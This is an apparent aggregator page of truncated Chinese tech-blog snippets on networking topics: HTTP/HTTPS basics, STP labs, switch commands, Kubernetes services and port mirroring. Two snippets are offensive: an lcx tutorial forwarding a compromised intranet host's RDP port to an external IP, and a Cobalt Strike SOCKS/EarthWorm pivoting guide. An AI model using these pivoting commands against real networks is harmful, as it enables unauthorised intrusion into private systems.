端口转发

lcx内网端口转发

只愿长相守 提交于 2020-01-30 02:41:18
复现过程 在提权过程中,我们经常碰到这样的情况,查询得知当前服务器存于内网中,所以无法通过mstsc来进行连接,那么这种情况下,我们就需要用到端口转发工具 lcx.exe 除此之外,还需要一台拥有 外网 IP 的主机。这里我们把内网的主机叫做肉鸡,独立 IP 主机叫做本机 将 lcx.exe 上传至 本机和肉鸡 之后,首先确定本机的 IP为119.90.140.191 一定要是外网ip 然后我们在本机执行: lcx.exe -listen 51 3388 。 这条命令的意思就是说,监听本机的 51 和 3388 端口,并将两个端口互相转发,端口 51 的入境流量发给端口 3388,反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口,为了避免与本机的远程连接服务冲突,选择了 3388。大家可以自行选择其他未占用端口。 然后我们在肉鸡上执行: lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389 意思就是监听本机(肉鸡)3389端口转发到119.90.140.191 端口51上 这条命令连接肉鸡的 3389 端口,和本机的 51 端口,并互相转发,之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388(或者127.0.0.1:3388) 可以看到lcx

计算机网络基础知识简答

孤人 提交于 2020-01-29 22:30:13
Http和Https的区别 Http协议(超文本传输协议)运行在TCP之上,明文传输,无状态,客户端与服务器端都无法验证对方的身份;Https是由SSL协议和Http协议构建的可进行加密传输,身份认证的网络协议。二者之间存在如下不同: 端口不同:Http与Http使用不同的连接方式,用的端口也不一样,前者是80,后者是443; 资源消耗:和HTTP通信相比,Https通信会由于加减密处理消耗更多的CPU和内存资源; 开销:Https通信需要证书,而证书一般需要向认证机构购买; Https的加密机制是一种共享密钥加密和公开密钥加密并用的混合加密机制。 对称加密与非对称加密 (我要和你建立链接,你真的要和我建立链接么,我真的要和你建立链接,成功) 对称密钥加密是指加密和解密使用同一个密钥的方式,这种方式存在的最大问题就是密钥发送问题,即如何安全地将密钥发给对方;而非对称加密是指使用一对非对称密钥,即公钥和私钥,公钥可以随意发布,但私钥只有自己知道。发送密文的一方使用对方的公钥进行加密处理,对方接收到加密信息后,使用自己的私钥进行解密。 由于非对称加密的方式不需要发送用来解密的私钥,所以可以保证安全性;但是和对称加密比起来,它非常的慢,所以我们还是要用对称加密来传送消息,但对称加密所使用的密钥我们可以通过非对称加密的方式发送出去。 三次握手过程(我要和你建立链接,你真的要和我建立链接么

华为交换机STP实验

那年仲夏 提交于 2020-01-29 05:09:37
华为交换机STP STP原理 选举过程 实验内容 实验拓扑 实验步骤 STP原理   STP是用来避免数据链路层出现逻辑环路的协议,使用BPDU传递网络信息计算出一根无环的树状网络结构,并阻塞特定端口。在网络出现故障的时候,STP能快速发现链路故障,并尽快找出另外一条路径进行数据传输。   交换机上运行的STP通过BPDU信息的交互,选举根交换机,然后每台非根交换机选择用来与根交换机通信的根端口,之后每个网段选择用来转发数据至根交换机的指定端口,最后剩余端口被阻塞。 选举过程 1.选举根交换机,依据根交换机ID。   根交换机ID由交换机优先级和MAC地址组成。首先比较交换机优先级,数值最低的为根交换机;如果优先级一样,则比较MAC地址,数值最低的选举为根交换机。 2.选举根端口   每台交换机上只能拥有一个根端口。生成树在选举出根交换机后,将在每台非根交换机上选举根端口。选举时首先比较该交换机上每个端口到达根交换机的根路径开销,路径开销最小的端口将成为根端口。如果根路径开销值相同,则比较每个端口所在链路上的上行交换机ID,如果交换机ID也相同,则比较每个端口所在链路上的上行端口ID。 3.选举指定端口   生成树在每台非根交换机选举出根端口之后,将在每个网段上选举指定端口,选举的比较规则和选举根端口类似。 实验内容   公司购置了4台交换机组建网络。考虑到网络的可靠性

基础网络操作命令(11 个命令)

a 夏天 提交于 2020-01-28 02:59:29
telnet命令 telnet命令:使用 TELNET 协议远程登录。 ssh命令 ssh命令:openssh套件中的客户端连接工具,可以给予ssh加密协议实现安全的远程登录服务器。 格式: ​ ssh [-1246AaCfGgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] ​ [-D [bind_address:]port] [-E log_file] [-e escape_char] ​ [-F configfile] [-I pkcs11] [-i identity_file] ​ [-J [user@]host[:port]] [-L address] [-l login_name] [-m mac_spec] ​ [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] ​ [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] ​ [user@]hostname [command] 参数: 参数 作用 -1 强制使用ssh协议版本1; -2 强制使用ssh协议版本2; -4 强制使用IPv4地址; -6 强制使用IPv6地址; -A 开启认证代理连接转发功能; -a

Linux/ubuntu 服务器开启6010端口-X11服务-ssh连接

北城以北 提交于 2020-01-27 18:49:11
此文首发于我的个人博客: Linux/ubuntu 服务器开启6010端口-X11服务-ssh连接 — zhang0peter的个人博客 晚上在检查我的Linux-ubuntu服务器的端口状况时发现开启了6010端口: -> # nmap -p 1-65535 127.0.0.1 Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-22 19:13 CST Nmap scan report for localhost.localdomain (127.0.0.1) Host is up (0.0000040s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 6010/tcp open x11 6011/tcp open x11 6013/tcp open x11 Nmap done: 1 IP address (1 host up) scanned in 7.63 seconds 我本来以为是服务器之前装了 vnc server ,没关导致6010,6011,6013的端口开着,具体参考这篇文章: Linux/ubuntu server 18.04 安装远程桌面–vnc server-tightvncserver —

Kubernetes系列之理解K8s Service的几种模式

邮差的信 提交于 2020-01-27 01:45:58
今天给大家介绍下k8s的service的几种访问模式。 概述 我们知道pod的ip不是固定的,是根据所在宿主机的docker0网卡生成的,每次重启,更新,调度等情况IP都会变,那pod与pod之间需要互相调用,肯定不能用ip的,因为地址不是固定的, 如何能保障pod之前访问的可靠性,由此就衍生出Service的概念。 在实际生产环境中,一般有两种访问 对集群内部的访问, 集群外部的访问。service现在分为以下类型 ClusterIP 集群内部容器访问地址,会生成一个虚拟IP 与pod不在一个网段。 NodePort 会在宿主机上映射一个端口,供外部应用访问模式。 Headless CluserIP 无头模式,无serviceip,即把spec.clusterip设置为None 。 LoadBalancer 使用外部负载均衡。 Port类型 我们先理解Service Port的几种类型。 NodePort 指定暴露到宿主机的端口,不指定的话会随机分配个,分配的IP在apiserver的配置文件中指定了--service-node-port-range=30000-50000,表示只允许分配30000-50000之间的端口。 比如一个nginx应用需要能被外部访问,就需要配置类型为type=NodePort,并且需要配置下nodePort: 30002(指定固定端口)

路由交换(三):生成树技术

萝らか妹 提交于 2020-01-26 23:15:35
生成树技术 一、生成树协议简介 为了提高网络可靠性,交换网络中通常会使用冗余链路来解决单点故障问题,但冗余链路会给交换网络带来环路风险,并导致广播风暴以及MAC地址表不稳定等问题,进而会影响到用户的通信质量。生成树协议STP(Spanning Tree Protocol)可以在提高可靠性的同时又能避免环路带来的各种问题。生成树协议主要作用有: 消除环路 通过阻断冗余链路来消除网络中可能存在的环路 链路备份 当活动路径发生故障时,激活备份链路,及时恢复网络连通性 生成树协议主要有STP(801.1d)、RSTP(802.1w)和MSTP(802.1s)三种协议。 二、STP 1. STP 基本概念 STP通过运行STA算法在交换网络中构造一棵树(无环)来消除交换网络中的环路。每个STP网络中,都存在一个根桥,其他交换机为非根桥,根桥位于整个逻辑树的根部,是STP网络的逻辑中心,非根桥是根桥的下游设备。当现有根桥发生故障时,非根桥之间会交互BPDU并重新选举根桥。 端口状态 端口状态 描述 Disable 不参与STP,不转发任何数据和BPDU Blocking 不转发数据,可接收BPDU,不发送BPDU,不学习MAC地址 Listening 不转发数据,可接收BPDU,可发送BPDU,不学习MAC地址 Learning 不转发数据,可接收BPDU,可发送BPDU,学习MAC地址

锐捷交换机常用命令速查

核能气质少年 提交于 2020-01-26 19:36:18
准备工作 >Enable 进入特权模式   #Exit 返回上一级操作模式   #End 返回到特权模式   #write memory 或copy running-config startup-config 保存配置文件   #del flash:config.text 删除配置文件(交换机及1700系列路由器)   #erase startup-config 删除配置文件(2500系列路由器)   #del flash:vlan.dat 删除Vlan配置信息(交换机)   #Configure terminal 进入全局配置模式   (config)# hostname switchA 配置设备名称为switchA   (config)#banner motd & 配置每日提示信息 &为终止符   (config)#enable secret level 1 0 star 配置远程登陆密码为star   (config)#enable secret level 15 0 star 配置特权密码为star   Level 1为普通用户级别,可选为1~15,15为最高权限级别;0表示密码不加密   (config)#enable services web-server 开启交换机WEB管理功能   Services 可选以下:web-server(WEB管理)、telnet

交换机同时设置多个观察口,解决镜像口不足问题

走远了吗. 提交于 2020-01-26 05:40:45
设备上的观察端口规格和1:N规格是有限的,如果当前需要连接的监控设备有很多,需要的观察端口数量超过了规格上限,一般可以通过以下两种方式解决。 方法一:配置远程镜像,通过远程观察端口进行内部环回广播 说明: 此方案中如果配置多个内部环回口,则需要确保这些环回口加入的VLAN ID不能相同,否则会导致环路。 图1 通过内部环回方式连接多监控设备组网图 如 图1 所示,网络管理员需要将镜像端口的报文镜像到4台监控设备,而SwitchB可配置观察端口数量少于4。通过远程观察端口内部环回广播的实现过程如下: 1. 配置远程端口镜像 system-view [SwitchB] observe-port 1 interface gigabitethernet1/0/1 vlan 20 //配置远程观察端口,VLAN20为用于内部环回广播的VLAN [SwitchB] interface gigabitethernet1/0/6 [SwitchB-GigabitEthernet1/0/6] port-mirroring to observe-port 1 both //将镜像端口出入方向报文都镜像到内部环回用的远程观察端口 [SwitchB-GigabitEthernet1/0/6] quit 2.配置内部环回功能 [SwitchB] vlan batch 20 //用于内部环回转发

Cobaltstrike系列教程(九)内置Socks与神器EW

拥有回忆 提交于 2020-01-26 03:07:50
0x000-前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-Socks概念 目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。 SOCKS 提供一个通用框架来使这些协议安全透明地穿过防火墙。 说的简单明了一点,在渗透测试中,我们使用socks技术,可以穿透进入目标机的内网,从而扩大我们的战果 0x002-Cobaltstrike自带Socks功能 选择一个beacon,右键,中转–>SOCKS Server,或使用命令socks [port] 弹出一个窗口,按要求配置好代理端口 如图,成功开启socks 4,连接我们teamserver的5126端口,即可进入目标机内网~ 0x003-使用ew+SocksCap穿透到目标机内网 ①Earthworm(下载见文末) Ew(Earthworm)是一款当之无愧的内网穿透大杀器,应用的平台非常广泛,包括 ew_for_Win.exe 适用各种Windows系统 ( X86指令集、X64指令集 ) Windows7、Windows XP ew_for_Linux32